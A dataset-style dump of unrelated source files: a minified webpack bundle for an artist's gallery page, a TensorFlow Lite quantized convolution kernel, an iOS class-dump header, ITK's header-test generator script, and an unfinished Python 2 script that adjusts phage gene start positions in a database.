text
stringlengths 3
1.05M
|
---|
(window.webpackJsonp=window.webpackJsonp||[]).push([[5],{"6A4u":function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.div.withConfig({displayName:"galleryWrapper__GalleryWrapper",componentId:"sc-1vq4w0i-0"})(["display:flex;flex-wrap:wrap;justify-content:center;align-items:center;margin:50px auto 0;width:100%;","{margin:20px auto;}"],i.a.phone)},"6BWh":function(e,t,a){"use strict";a.r(t),a.d(t,"query",(function(){return w}));a("f3/d");var n=a("q1tI"),i=a.n(n),o=a("yBb5"),r=a("Wbzz"),l=a("WC/B"),s=a("RJI5"),p=a("6A4u"),c=a("7O1Q"),d=a("fGBs"),u=a("AP/y"),m=a("GoKU"),f=a("XX2/"),g=a("DffI"),h=a("hmSs"),x=a("Kz2E"),b=a("lq3F"),w="2244380036";t.default=function(e){var t=e.data;return i.a.createElement(o.a,null,i.a.createElement(l.a,null,t.allDataJson.edges[4].node.name),i.a.createElement(s.a,null,i.a.createElement(b.a,null,i.a.createElement(r.a,{to:t.allDataJson.edges[3].node.url}," ",i.a.createElement("span",null," ←")),i.a.createElement(r.a,{to:"/"}," home "),i.a.createElement(r.a,{to:t.allDataJson.edges[5].node.url}," ",i.a.createElement("span",null," →"))),i.a.createElement(p.a,null,i.a.createElement(c.a,null," ",i.a.createElement(d.a,{src:"/artists/ana2img1.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img1Description)),i.a.createElement(c.a,null," ",i.a.createElement(d.a,{src:"/artists/ana2img2.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img2Description)),i.a.createElement(c.a,null," ",i.a.createElement(d.a,{src:"/artists/ana2img3.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img3Description)),i.a.createElement(c.a,null," ",i.a.createElement(d.a,{src:"/artists/ana2img4.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img4Description)),i.a.createElement(c.a,null," ",i.a.createElement(d.a,{bigScale:!0,src:"/artists/ana2img5.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img5Description)),i.a.createElement(c.a,null," ",i.a.createElement(d.a,{src:"/artists/ana2img6.jpg"}),i.a.createElement(u.a,null,t.allDataJson.edges[4].node.img6Description))),i.a.createElement(m.a,null,i.a.createElement(h.a,null,t.allDataJson.edges[4].node.title),i.a.createElement(x.a,{as:"a",href:"http://anaalmeidapinto.com"},t.allDataJson.edges[4].node.website),i.a.createElement(f.a,null,i.a.createElement("p",null,"Como materializar objetos e propostas artísticas na era dos suportes digitais? Como encontrar formatos disruptivos para discursos em ambientes virtuais? Como converter o observador em comissário, exaltando a sua participação na criação e interpretação? Como investigar a apropriação nos processos escultóricos contemporâneos de forma activa e consciente, cedendo ao processo do fazer toda a significação e partindo de um pressuposto de partilha e diálogo entre autor, objecto e público? Onde se esbate a linha de apropriação, na forma, na linguagem, no espaço? Quem é realmente o autor se a interpretação é múltipla? Como incorporar a noção de território neste contexto de confinamento? Será o nosso território pessoal um símbolo global? Poderá o processo de fazer constituir um espelho desse território? Quais as suas margens? E de que forma podemos ainda acrescentar uma crítica social que espelhe o passado, presente e futuro que vivemos? Prec(ç)ário é uma escultura que acontece no campo expandido entre o mundo digital e o ambiente doméstico de todos os que participam, apropriando espaços e objectos domésticos para interpretar a relação desigual entre o cidadão e o sistema financeiro. Cada interpretação terá a sua leitura e a sua narrativa, e todas as partes compões o todo, sempre em crescimento e sempre em evolução.")),i.a.createElement(g.a,null,i.a.createElement("p",null,"How to materialize objects and artistic proposals in the era of digital media? How to find disruptive formats for speeches in virtual environments? How to convert the observer into a commissioner, extolling his participation into creation and interpretation? How to investigate appropriation in contemporary sculptural processes in an active and conscious way, yielding all meaning to the process of making and starting from an assumption of sharing and dialogue between author, object and audience? Where does the appropriation line fade, in form, in language, in space? Who is really the author if the interpretation is multiple? How to incorporate the notion of territory in this context of confinement? Is our personal territory a global symbol? Can the process of making be a mirror of that territory? What are its margins? And how can we add a social critique that reflects the past, present and future we live in? Prec(ç)ário is a sculpture that takes place in the expanded field between the digital world and the home environment of all who participate, appropriating spaces and domestic objects to interpret the unequal relationship between the citizen and the financial system. Each interpretation will have its reading and its narrative, as all parts make up the whole, always growing and always evolving.")))),i.a.createElement(r.a,{to:t.allDataJson.edges[4].node.url,className:"scrollTopButton"}," ",i.a.createElement("span",null," ←"),"to the top"))}},"7O1Q":function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.div.withConfig({displayName:"imageWrapper__ImageWrapper",componentId:"tx2eqf-0"})(["display:flex;padding-bottom:10px;flex-direction:column;width:",";margin:0 auto;audio{margin:0 auto;}","{width:80%;}","{width:100%;}"],(function(e){return e.isBig?"61%":"40%"}),i.a.tablet,i.a.phone)},"AP/y":function(e,t,a){"use strict";a.d(t,"a",(function(){return n}));var n=a("vOnD").b.p.withConfig({displayName:"imageTitle__ImageTitle",componentId:"sc-1lp9rba-0"})(["width:60%;font-size:10px;height:100px;margin:0 auto;"])},DffI:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.div.withConfig({displayName:"textNoBorder__TextNoBorder",componentId:"sc-1zezrd-0"})(["display:flex;flex-direction:column;flex-wrap:wrap;width:100%;padding:50px;p{font-size:15px;text-align:",";}","{padding:10px;width:100% !important;}"],(function(e){return e.alignLeft?"left":"right"}),i.a.phone)},GoKU:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.div.withConfig({displayName:"textWrapper__TextWrapper",componentId:"sc-15mzljr-0"})(["display:flex;font-weight:300;flex-direction:column;text-align:",";flex-wrap:wrap;padding:50px;width:100%;","{padding:20px;}","{padding:5px;}"],(function(e){return e.centered?"center":"right"}),i.a.tablet,i.a.phone)},Kz2E:function(e,t,a){"use strict";a.d(t,"a",(function(){return r}));var n=a("vOnD"),i=a("5RMe"),o=a("uZbd"),r=n.b.h3.withConfig({displayName:"website__Website",componentId:"ryjd4v-0"})(['font-family:"Montserrat";font-weight:300;width:100%;color:',";height:50px;font-size:20px;padding:0 50px;","{font-size:15px;}","{padding:0;}"],i.a.greyDark,o.a.tablet,o.a.phone)},RJI5:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.div.withConfig({displayName:"mainWrapper__MainWrapper",componentId:"sc-197er53-0"})(["display:flex;flex-direction:column;width:80%;margin:0 auto;","{width:100%;}"],i.a.phone)},"WC/B":function(e,t,a){"use strict";a.d(t,"a",(function(){return r}));var n=a("vOnD"),i=a("5RMe"),o=a("uZbd"),r=n.b.h1.withConfig({displayName:"H1",componentId:"ulmasc-0"})(['font-size:35px;font-family:"Montserrat";font-weight:400;text-align:right;transform:rotate(270deg);position:absolute;top:400px;left:-150px;width:500px;height:100px;',"{font-size:30px;left:-180px;}",'{width:100%;position:absolute;height:50px;top:50px;left:0;right:50%;padding-right:5px;font-size:20px;margin:50px auto 0;transform:none;}:before{content:"";width:100%;height:3px;background-color:',";position:absolute;top:25px;right:500px;","{top:10px;right:0px;width:100%;}}"],o.a.tablet,o.a.phone,i.a.yellow,o.a.phone)},Wbzz:function(e,t,a){"use strict";a.d(t,"b",(function(){return p}));a("xfY5");var n=a("q1tI"),i=a.n(n),o=a("+ZDr"),r=a.n(o);a.d(t,"a",(function(){return r.a}));a("lw3w"),a("emEt").default.enqueue;var l=i.a.createContext({});function s(e){var t=e.staticQueryData,a=e.data,n=e.query,o=e.render,r=a?a.data:t[n]&&t[n].data;return i.a.createElement(i.a.Fragment,null,r&&o(r),!r&&i.a.createElement("div",null,"Loading (StaticQuery)"))}var p=function(e){var t=e.data,a=e.query,n=e.render,o=e.children;return i.a.createElement(l.Consumer,null,(function(e){return i.a.createElement(s,{data:t,query:a,render:n||o,staticQueryData:e})}))}},"XX2/":function(e,t,a){"use strict";a.d(t,"a",(function(){return r}));var n=a("vOnD"),i=a("uZbd"),o=a("5RMe"),r=n.b.div.withConfig({displayName:"textWithBorder__TextWithBorder",componentId:"s1ei68-0"})(["border:3px solid ",";display:flex;flex-direction:column;flex-wrap:wrap;width:100%;padding:50px;p{font-size:15px;text-align:",";}","{padding:20px;}","{padding:10px;}"],o.a.greyLight,(function(e){return e.alignLeft?"left":"right"}),i.a.tablet,i.a.phone)},fGBs:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.img.withConfig({displayName:"styledImage__StyledImage",componentId:"sc-8ae8dm-0"})(["width:90%;max-height:700px;height:auto;padding:0 0 10px 20px;object-fit:contain;margin:0 auto;transition:all 0.6s ease-in-out;","{padding:0 0 10px 0;}&:hover{transform:scale(1.4);transform:",";","{transform:none;}}"],i.a.phone,(function(e){return e.bigScale?"scale(1.7)":"scale(1.3)"}),i.a.phone)},hmSs:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.h2.withConfig({displayName:"titleOfWork__TitleOfWork",componentId:"sc-1hka23r-0"})(['font-family:"Montserrat";width:100%;font-size:30px;padding:0 50px 0 200px;',"{font-size:20px;padding:0 50px 0 0;}","{padding:0;}"],i.a.tablet,i.a.phone)},lq3F:function(e,t,a){"use strict";a.d(t,"a",(function(){return o}));var n=a("vOnD"),i=a("uZbd"),o=n.b.nav.withConfig({displayName:"navMainWrapper__NavMainWrapper",componentId:"sc-1dk3hrj-0"})(['margin:30px auto 100px;display:flex;position:relative;flex-wrap:wrap;font-size:15px;width:100%;font-family:"Montserrat";justify-content:space-between;',"{padding:0 10px 0 10px;}"],i.a.phone)},lw3w:function(e,t,a){var n;e.exports=(n=a("rzlk"))&&n.default||n},rzlk:function(e,t,a){"use strict";a.r(t);a("91GP");var n=a("q1tI"),i=a.n(n),o=a("IOVJ");t.default=function(e){var t=e.location,a=e.pageResources;return a?i.a.createElement(o.a,Object.assign({location:t,pageResources:a},a.json)):null}},xfY5:function(e,t,a){"use strict";var n=a("dyZX"),i=a("aagx"),o=a("LZWt"),r=a("Xbzi"),l=a("apmT"),s=a("eeVq"),p=a("kJMx").f,c=a("EemH").f,d=a("hswa").f,u=a("qncB").trim,m=n.Number,f=m,g=m.prototype,h="Number"==o(a("Kuth")(g)),x="trim"in String.prototype,b=function(e){var t=l(e,!1);if("string"==typeof t&&t.length>2){var a,n,i,o=(t=x?t.trim():u(t,3)).charCodeAt(0);if(43===o||45===o){if(88===(a=t.charCodeAt(2))||120===a)return NaN}else if(48===o){switch(t.charCodeAt(1)){case 66:case 98:n=2,i=49;break;case 79:case 111:n=8,i=55;break;default:return+t}for(var r,s=t.slice(2),p=0,c=s.length;p<c;p++)if((r=s.charCodeAt(p))<48||r>i)return NaN;return parseInt(s,n)}}return+t};if(!m(" 0o1")||!m("0b1")||m("+0x1")){m=function(e){var t=arguments.length<1?0:e,a=this;return a instanceof m&&(h?s((function(){g.valueOf.call(a)})):"Number"!=o(a))?r(new f(b(t)),a,m):b(t)};for(var w,v=a("nh4g")?p(f):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),y=0;v.length>y;y++)i(f,w=v[y])&&!i(m,w)&&d(m,w,c(f,w));m.prototype=g,g.constructor=m,a("KroJ")(n,"Number",m)}},yBb5:function(e,t,a){"use strict";a.d(t,"a",(function(){return g}));var n=a("q1tI"),i=a.n(n),o=a("vOnD"),r=a("Wbzz"),l=a("uZbd"),s=o.b.nav.withConfig({displayName:"BottomNavArtistPage__NavigationWrapper",componentId:"f9l4bm-0"})(['margin:50px auto 50px;display:flex;flex-wrap:wrap;font-size:15px;width:60%;font-family:"Montserrat";font-weight:300;',"{width:100%;margin:0 auto;}"],l.a.phone),p=o.b.ul.withConfig({displayName:"BottomNavArtistPage__NavigationList",componentId:"f9l4bm-1"})(["margin:0;display:flex;justify-content:space-between;width:100%;list-style:none;","{display:block;padding:0;margin-bottom:50px;}"],l.a.phone),c=o.b.li.withConfig({displayName:"BottomNavArtistPage__NavigationListItem",componentId:"f9l4bm-2"})(["padding-top:10px;width:30%;text-align:center;text-decoration:none;color:inherit;","{width:100%;padding-top:30px;}a{text-decoration:none;color:inherit;}"],l.a.phone),d=o.b.li.withConfig({displayName:"BottomNavArtistPage__NavigationListItemUp",componentId:"f9l4bm-3"})(["padding:20px;border-bottom:1px black solid;width:60%;margin:0 auto;text-align:center;color:inherit;list-style:none;"]),u=function(){return i.a.createElement(s,null,i.a.createElement(d,null,"2020"),i.a.createElement(p,null,i.a.createElement(c,null,i.a.createElement(r.a,{to:"/textPt"},"text PT /"),i.a.createElement(r.a,{to:"/textEn"}," ENG")),i.a.createElement(c,null,i.a.createElement(r.a,{to:"/credits"},"credits"))))},m=a("1gFo"),f=o.b.div.withConfig({displayName:"Layout__LayoutWrapper",componentId:"sc-1bu8igz-0"})(["margin:0 auto;text-align:center;display:flex;flex-wrap:wrap;padding:0 auto;position:relative;","{margin:0 auto;display:block;padding:0;}"],l.a.phone);function g(e){var t=e.children;return i.a.createElement(i.a.Fragment,null,i.a.createElement(m.a,null),i.a.createElement(f,null,t,i.a.createElement(u,null)))}}}]);
//# sourceMappingURL=component---src-pages-ana-2-js-64d12b38cea206a8a0ef.js.map |
/* Copyright 2019 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_LITE_KERNELS_INTERNAL_REFERENCE_INTEGER_OPS_CONV_H_
#define TENSORFLOW_LITE_KERNELS_INTERNAL_REFERENCE_INTEGER_OPS_CONV_H_
#include "tensorflow/lite/kernels/internal/common.h"
namespace tflite {
namespace reference_integer_ops {
// Fixed-point per-channel-quantization convolution reference kernel.
inline void ConvPerChannel(
const ConvParams ¶ms, const int32_t *output_multiplier,
const int32_t *output_shift, const RuntimeShape &input_shape,
const int8_t *input_data, const RuntimeShape &filter_shape,
const int8_t *filter_data, const RuntimeShape &bias_shape,
const int32_t *bias_data, const RuntimeShape &output_shape,
int8_t *output_data)
{
// Get parameters.
const int32_t input_offset = params.input_offset; // r = s(q - Z)
const int stride_width = params.stride_width;
const int stride_height = params.stride_height;
const int dilation_width_factor = params.dilation_width_factor;
const int dilation_height_factor = params.dilation_height_factor;
const int pad_width = params.padding_values.width;
const int pad_height = params.padding_values.height;
const int32_t output_offset = params.output_offset;
// Set min and max value of the output.
const int32_t output_activation_min = params.quantized_activation_min;
const int32_t output_activation_max = params.quantized_activation_max;
// Consistency check.
TFLITE_DCHECK_LE(output_activation_min, output_activation_max);
TFLITE_DCHECK_EQ(input_shape.DimensionsCount(), 4);
TFLITE_DCHECK_EQ(filter_shape.DimensionsCount(), 4);
TFLITE_DCHECK_EQ(output_shape.DimensionsCount(), 4);
const int batches = MatchingDim(input_shape, 0, output_shape, 0);
const int input_depth = MatchingDim(input_shape, 3, filter_shape, 3);
const int output_depth = MatchingDim(filter_shape, 0, output_shape, 3);
if (bias_data) {
TFLITE_DCHECK_EQ(bias_shape.FlatSize(), output_depth);
}
// Check dimensions of the tensors.
const int input_height = input_shape.Dims(1);
const int input_width = input_shape.Dims(2);
const int filter_height = filter_shape.Dims(1);
const int filter_width = filter_shape.Dims(2);
const int output_height = output_shape.Dims(1);
const int output_width = output_shape.Dims(2);
for (int batch = 0; batch < batches; ++batch) {
for (int out_y = 0; out_y < output_height; ++out_y) {
const int in_y_origin = (out_y * stride_height) - pad_height;
for (int out_x = 0; out_x < output_width; ++out_x) {
const int in_x_origin = (out_x * stride_width) - pad_width;
for (int out_channel = 0; out_channel < output_depth; ++out_channel) {
int32_t acc = 0;
for (int filter_y = 0; filter_y < filter_height; ++filter_y) {
const int in_y = in_y_origin + dilation_height_factor * filter_y;
for (int filter_x = 0; filter_x < filter_width; ++filter_x) {
const int in_x = in_x_origin + dilation_width_factor * filter_x;
// Zero padding by omitting the areas outside the image.
const bool is_point_inside_image =
(in_x >= 0) && (in_x < input_width) && (in_y >= 0) &&
(in_y < input_height);
if (!is_point_inside_image) {
continue;
}
for (int in_channel = 0; in_channel < input_depth; ++in_channel) {
int32_t input_val = input_data[Offset(input_shape, batch, in_y,
in_x, in_channel)];
int32_t filter_val = filter_data[Offset(
filter_shape, out_channel, filter_y, filter_x, in_channel)];
// Accumulate with 32 bits accumulator.
// In the nudging process during model quantization, we force
// real value of 0.0 be represented by a quantized value. This
// guarantees that the input_offset is a int8_t, even though
// it is represented using int32_t. int32_t += int8_t *
// (int8_t - int8_t) so the highest value we can get from each
// accumulation is [-127, 127] * ([-128, 127] -
// [-128, 127]), which is [-32512, 32512]. log2(32512)
// = 14.98, which means we can accumulate at least 2^16
// multiplications without overflow. The accumulator is
// applied to a filter so the accumulation logic will hold as
// long as the filter size (filter_y * filter_x * in_channel)
// does not exceed 2^16, which is the case in all the models
// we have seen so far.
// TODO(b/174275578): Add a check to make sure the
// accumulator depth is smaller than 2^16.
acc += filter_val * (input_val + input_offset);
}
}
}
if (bias_data) {
acc += bias_data[out_channel];
}
acc = MultiplyByQuantizedMultiplier(
acc, output_multiplier[out_channel], output_shift[out_channel]);
acc += output_offset;
acc = std::max(acc, output_activation_min);
acc = std::min(acc, output_activation_max);
output_data[Offset(output_shape, batch, out_y, out_x, out_channel)] =
static_cast<int8_t>(acc);
}
}
}
}
}
// Fixed-point per-channel-quantization convolution reference kernel.
// 16-bit data and 8-bit filter
inline void ConvPerChannel(
const ConvParams ¶ms, const int32_t *output_multiplier,
const int32_t *output_shift, const RuntimeShape &input_shape,
const int16_t *input_data, const RuntimeShape &filter_shape,
const int8_t *filter_data, const RuntimeShape &bias_shape,
const std::int64_t *bias_data, const RuntimeShape &output_shape,
int16_t *output_data)
{
// Get parameters.
const int stride_width = params.stride_width;
const int stride_height = params.stride_height;
const int dilation_width_factor = params.dilation_width_factor;
const int dilation_height_factor = params.dilation_height_factor;
const int pad_width = params.padding_values.width;
const int pad_height = params.padding_values.height;
// Set min and max value of the output.
const int32_t output_activation_min = params.quantized_activation_min;
const int32_t output_activation_max = params.quantized_activation_max;
// Consistency check.
TFLITE_DCHECK_LE(output_activation_min, output_activation_max);
TFLITE_DCHECK_EQ(input_shape.DimensionsCount(), 4);
TFLITE_DCHECK_EQ(filter_shape.DimensionsCount(), 4);
TFLITE_DCHECK_EQ(output_shape.DimensionsCount(), 4);
const int batches = MatchingDim(input_shape, 0, output_shape, 0);
const int input_depth = MatchingDim(input_shape, 3, filter_shape, 3);
const int output_depth = MatchingDim(filter_shape, 0, output_shape, 3);
if (bias_data) {
TFLITE_DCHECK_EQ(bias_shape.FlatSize(), output_depth);
}
// Check dimensions of the tensors.
const int input_height = input_shape.Dims(1);
const int input_width = input_shape.Dims(2);
const int filter_height = filter_shape.Dims(1);
const int filter_width = filter_shape.Dims(2);
const int output_height = output_shape.Dims(1);
const int output_width = output_shape.Dims(2);
for (int batch = 0; batch < batches; ++batch) {
for (int out_y = 0; out_y < output_height; ++out_y) {
const int in_y_origin = (out_y * stride_height) - pad_height;
for (int out_x = 0; out_x < output_width; ++out_x) {
const int in_x_origin = (out_x * stride_width) - pad_width;
for (int out_channel = 0; out_channel < output_depth; ++out_channel) {
std::int64_t acc = 0;
for (int filter_y = 0; filter_y < filter_height; ++filter_y) {
const int in_y = in_y_origin + dilation_height_factor * filter_y;
for (int filter_x = 0; filter_x < filter_width; ++filter_x) {
const int in_x = in_x_origin + dilation_width_factor * filter_x;
// Zero padding by omitting the areas outside the image.
const bool is_point_inside_image =
(in_x >= 0) && (in_x < input_width) && (in_y >= 0) &&
(in_y < input_height);
if (!is_point_inside_image) {
continue;
}
for (int in_channel = 0; in_channel < input_depth; ++in_channel) {
int32_t input_val = input_data[Offset(input_shape, batch, in_y,
in_x, in_channel)];
int32_t filter_val = filter_data[Offset(
filter_shape, out_channel, filter_y, filter_x, in_channel)];
// Accumulate with 64 bits accumulator.
// int64_t += int8_t * int16_t so the highest value we can
// get from each accumulation is [-127, 127] * ([-32768,
// 32767] -
// [-32768, 32767]), which is [-8322945, 8322945].
// log2(8322945) = 22.99.
acc += filter_val * input_val;
}
}
}
if (bias_data) {
acc += bias_data[out_channel];
}
int32_t scaled_acc = MultiplyByQuantizedMultiplier(
acc, output_multiplier[out_channel], output_shift[out_channel]);
scaled_acc = std::max(scaled_acc, output_activation_min);
scaled_acc = std::min(scaled_acc, output_activation_max);
output_data[Offset(output_shape, batch, out_y, out_x, out_channel)] =
static_cast<int16_t>(scaled_acc);
}
}
}
}
}
} // namespace reference_integer_ops
} // namespace tflite
#endif // TENSORFLOW_LITE_KERNELS_INTERNAL_REFERENCE_INTEGER_OPS_CONV_H_
|
/*
* This header is generated by classdump-dyld 1.0
* on Tuesday, November 5, 2019 at 2:43:44 AM Mountain Standard Time
* Operating System: Version 13.0 (Build 17J586)
* Image Source: /System/Library/PrivateFrameworks/PhotosUICore.framework/PhotosUICore
* classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos.
*/
@class NSString;
@protocol PXBarItem <NSObject>
@property (nonatomic,copy,readonly) NSString * identifier;
@required
-(NSString *)identifier;
@end
|
#!/usr/bin/env python
# ==========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ==========================================================================*/
from __future__ import print_function
usage = """usage: BuildHeaderTest.py <module_name> <module_source_path> <module_binary_path> <maximum_number_of_headers>
This script generates a a source file designed to check the headers in each
module. The generated HeaderTest can be found in the module binary 'test'
directory in a file itk<module_name>HeaderTest#.cxx. This contains a null
main(), but includes all the classes in the module. The primary purpose of this
test is to make sure there are not missing module dependencies. It also tests
for syntax and missing #include's.
"""
# Headers to not test because of dependecy issues, etc.
BANNED_HEADERS = set(
(
"itkDynamicLoader.h", # This cannot be included when ITK_DYNAMIC_LOADING is OFF
"itkExceptionObject.h", # There is a pre-processor check so people use itkMacro.h instead.
"itkFFTWForwardFFTImageFilter.h",
"itkFFTWInverseFFTImageFilter.h",
"itkFFTWRealToHalfHermitianForwardFFTImageFilter.h",
"itkFFTWHalfHermitianToRealInverseFFTImageFilter.h",
"itkFFTWComplexToComplexFFTImageFilter.h",
"itkFFTWCommon.h",
"itkPyBuffer.h", # needs Python.h, etc
"itkPyVnl.h", # needs Python.h, etc
"itkPyVectorContainer.h", # needs Python.h, etc
"itkVanHerkGilWermanErodeDilateImageFilter.h", # circular include's
"itkBSplineDeformableTransform.h", # deprecated
"vtkCaptureScreen.h", # these includes require VTK
"itkMultiThreader.h", # Compatibility file, it should not be used
"itkEnableIf.h", # Compatibility file, it should not be used
"itkIsSame.h", # Compatibility file, it should not be used
"itkIsBaseOf.h", # Compatibility file, it should not be used
"itkIsConvertible.h", # Compatibility file, it should not be used
"itkViewImage.h", # Depends on VTK_RENDERING_BACKEND
"QuickView.h", # Depends on VTK_RENDERING_BACKEND
"itkBSplineDeformableTransformInitializer.h",
)
)
HEADER = """/*=========================================================================
*
* Copyright NumFOCUS
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0.txt
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*=========================================================================*/
// This file has been generated by BuildHeaderTest.py
// To regenerate, build the ITKHeaderTests target.
// This is a test to include each header file for Insight.
"""
TRAILER = """
#include <cstdlib> // needed for EXIT_SUCCESS macro
int main ( int , char* [] )
{
return EXIT_SUCCESS;
}
"""
import glob
import os
import sys
if len(sys.argv) < 6:
print(usage)
sys.exit(1)
def main():
module_name = sys.argv[1]
module_source_path = sys.argv[2]
module_binary_path = sys.argv[3]
maximum_number_of_headers = int(sys.argv[4])
test_num = int(sys.argv[5])
# Get all the header files.
include_dir = os.path.join(module_source_path, "include")
h_files = glob.glob(os.path.join(include_dir, "*.h"))
h_files = [os.path.basename(h) for h in h_files]
added_header_idx = maximum_number_of_headers * (test_num - 1)
test_source_path = os.path.join(module_binary_path, "test")
if not os.path.exists(test_source_path):
os.makedirs(test_source_path)
test_source_file = os.path.join(
test_source_path, str(module_name) + "HeaderTest" + str(test_num) + ".cxx"
)
test_src = open(test_source_file, "w")
try:
test_src.write(HEADER)
if added_header_idx + maximum_number_of_headers > len(h_files):
max_idx = added_header_idx + len(h_files) % maximum_number_of_headers
else:
max_idx = added_header_idx + maximum_number_of_headers
for i in range(added_header_idx, max_idx):
# Files that include VTK headers need to link to VTK.
if h_files[i] in BANNED_HEADERS or h_files[i].lower().find("vtk") != -1:
to_include = (
'// #include "' + h_files[i] + '" // Banned in BuildHeaderTest.py\n'
)
else:
to_include = '#include "' + h_files[i] + '"\n'
test_src.write(to_include)
test_src.write(TRAILER)
finally:
test_src.close()
return 0
if __name__ == "__main__":
ret = main()
sys.exit(ret)
|
from functions import *
import argparse
def updateStart(db, gene_id, newStart, rev_comp):
cur = db.cursor()
if rev_comp == False:
cur.execute("UPDATE gene SET start = " + str(newStart) + ", adjusted = 1 WHERE id = " + str(gene_id))
else:
cur.execute("UPDATE gene SET end = " + str(newStart) + ", adjusted = 1 WHERE id = " + str(gene_id))
db.commit()
def findBestStart(db, gene, potentialStarts, ideal_move_distance):
print potentialStarts
if gene['rev_comp']:
check = gene['end']
else:
check = gene['start']
imd = ideal_move_distance * 3
diffs = [np.abs(s - imd) for s in potentialStarts]
return potentialStarts[np.argmax(diffs)]
def tooLongForwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['start'] + (3 * i) # increase our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3] # codon is going forward
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "***far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "***on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooLongBackwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['start'] - (3 * i) # decrease our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3] # codon is going backward
codon = codon[::-1] # reverse the codon
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooLongForwardRevComp(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['end'] + (3 * i) - 2 # increase our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3] # codon is going forward
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "***far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "***on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooLongBackwardRevComp(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['end'] - (3 * i) - 2 # decrease our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3] # codon is going backward
codon = codon[::-1] # reverse the codon
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooLong(db, gene, ideal_move_distance, start_codons, stop_codons,revcomp_start_codons,revcomp_stop_codons):
if gene['rev_comp'] == False:
if gene['start'] < gene['end']:
print "Forward"
return tooLongForwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons)
elif gene['start'] > gene['end']:
print "Backward"
